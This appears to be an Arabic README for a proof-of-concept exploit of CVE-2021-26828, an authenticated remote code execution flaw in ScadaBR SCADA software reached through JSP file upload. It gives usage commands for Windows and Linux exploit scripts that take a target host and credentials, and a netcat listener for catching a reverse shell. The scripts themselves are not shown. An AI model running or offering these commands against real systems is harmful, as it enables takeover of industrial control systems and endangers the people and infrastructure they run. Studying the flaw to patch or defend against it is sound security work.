
إثبات المفهوم لاستغلال الثغرة CVE-2021-26828 التي تمكن من تنفيذ الأوامر عن بُعد بعد التحقق على أنظمة ScadaBR SCADA عبر رفع ملفات JSP. يدعم أهداف Windows و Linux مع حمولات reverse shell.
$ sudo python WinScada_RCE.py <Remote_Host> <Remote_Port> <User> <Pass>
$ sudo nc -vnlp 4444
$ sudo python LinScada_RCE.py <Remote_Host> <Remote_Port> <User> <Pass> <Reverse_IP> <Reverse_Port>
